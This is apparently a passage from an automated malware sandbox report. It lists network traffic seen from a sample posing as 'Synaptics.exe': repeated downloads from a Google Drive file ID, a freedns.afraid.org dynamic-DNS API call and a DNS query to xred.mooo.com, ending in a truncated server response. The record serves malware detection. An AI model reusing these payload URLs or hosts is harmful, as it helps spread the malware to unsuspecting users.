                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                          Source: global trafficDNS traffic detected: DNS query: docs.google.com
                          Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                          Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6y-NqeDsV2q-e1p0fryf_bqdAU3yzpjGLdcNLadSpNmd_4bFDyqGS45XIawW61yq2-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:28:47 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SQEE3XChO5OufOScLviPgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, 